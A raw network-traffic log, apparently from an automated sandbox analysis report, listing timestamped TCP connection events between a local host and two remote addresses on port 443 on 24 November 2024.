                                                                                                                                                                                              Nov 24, 2024 13:40:42.520847082 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520858049 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520863056 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.523757935 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.523791075 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.523869038 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.524009943 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.524028063 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.687771082 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.687942982 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.687999964 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.688321114 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.688338041 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.688350916 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.688355923 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.693814039 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.693851948 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.693913937 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.694212914 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.694226980 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:43.682904005 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:43.682961941 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:43.683051109 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:43.683342934 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:43.683357954 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:43.896773100 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:43.897443056 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:43.897466898 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:43.898102045 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:43.898108006 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.109811068 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.110385895 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.110424995 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.110888958 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.110894918 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.242314100 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.243020058 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.243058920 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.243465900 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.243474007 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.312505007 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.313018084 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.313045025 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.313477993 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.313491106 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.329664946 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.332922935 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.332995892 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.333050966 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.333071947 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.333081961 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.333086967 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.336117983 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.336160898 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.336234093 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.336369038 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.336381912 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.473248005 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.473907948 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.473922968 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.474392891 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.474396944 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.553011894 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556304932 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556345940 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556372881 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556447029 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556545019 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556569099 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556581020 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.556587934 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.559696913 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.559747934 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.559845924 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.560009003 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.560022116 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752222061 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752286911 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752365112 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752563000 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752574921 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752589941 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.752594948 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.756026983 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.756119967 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.756218910 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.756372929 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.756421089 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790571928 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790626049 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790733099 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790923119 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790951967 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790971041 CET49988443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.790980101 CET4434998813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.796714067 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.796757936 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.796844959 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.797008038 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.797027111 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955208063 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955231905 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955269098 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955280066 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955322981 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955580950 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955593109 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955605030 CET49989443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.955610991 CET4434998913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.958456039 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.958533049 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:44.958614111 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.958745956 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:44.958775997 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:45.486463070 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:45.491950035 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:45.491993904 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:45.492286921 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:45.492753029 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:45.492841959 CET44349990142.250.181.100192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:45.541424990 CET49990443192.168.2.6142.250.181.100
                                                                                                                                                                                              Nov 24, 2024 13:40:46.201862097 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.202414989 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.202433109 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.202924967 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.202930927 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.352180004 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.352942944 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.352972984 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.353442907 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.353449106 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.520447016 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.521051884 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.521085978 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.521517038 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.521522045 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.536338091 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.537019968 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.537069082 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.537496090 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.537509918 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.674262047 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677150965 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677208900 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677242994 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677254915 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677264929 CET49991443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.677269936 CET4434999113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.680217028 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.680258989 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.680322886 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.680481911 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.680494070 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.687160015 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.687501907 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.687540054 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.687926054 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.687932968 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.796700954 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.799855947 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.799892902 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.799948931 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.800019979 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.800074100 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.800097942 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.800108910 CET49992443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.800117016 CET4434999213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.803217888 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.803248882 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.803348064 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.803533077 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.803548098 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.971880913 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.974955082 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.975048065 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.975117922 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.975131989 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.975143909 CET49994443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.975150108 CET4434999413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.978199005 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.978235960 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.978321075 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.978503942 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:46.978516102 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:46.997616053 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000504971 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000581026 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000628948 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000646114 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000657082 CET49993443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.000662088 CET4434999313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.002998114 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.003015995 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.003088951 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.003232002 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.003243923 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.159708977 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.162744045 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.162789106 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.162856102 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.162919044 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.162993908 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.163017035 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.163031101 CET49995443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.163036108 CET4434999513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.166538000 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.166587114 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:47.166680098 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.166830063 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:47.166848898 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.463639021 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.464229107 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.464271069 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.464700937 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.464715958 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.590080023 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.590652943 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.590666056 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.591176987 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.591181993 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.767261028 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.767968893 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.768033981 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.768357992 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.768377066 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.791052103 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.791399002 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.791424036 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.791765928 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.791771889 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.906611919 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.909660101 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.909745932 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.916615009 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.916615009 CET49996443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.916666985 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.916692972 CET4434999613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.919970989 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.920027018 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.920085907 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.920245886 CET50001443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.920258999 CET4435000113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.945473909 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.945869923 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.945936918 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:48.946309090 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:48.946331024 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.043232918 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046232939 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046308041 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046334982 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046353102 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046364069 CET49997443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.046370029 CET4434999713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.048736095 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.048805952 CET4435000213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.048890114 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.049010038 CET50002443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.049042940 CET4435000213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.212452888 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215787888 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215837955 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215864897 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215914011 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215953112 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.215998888 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.216032028 CET49998443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.216047049 CET4434999813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.218055010 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.218111992 CET4435000313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.218180895 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.218287945 CET50003443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.218308926 CET4435000313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.233180046 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236313105 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236404896 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236454010 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236468077 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236478090 CET49999443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.236481905 CET4434999913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.238420963 CET50004443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.238441944 CET4435000413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.238503933 CET50004443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.238619089 CET50004443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.238632917 CET4435000413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.388673067 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.392040014 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.392096043 CET4435000013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:49.392121077 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.392178059 CET50000443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:49.392221928 CET50000443192.168.2.613.107.246.63
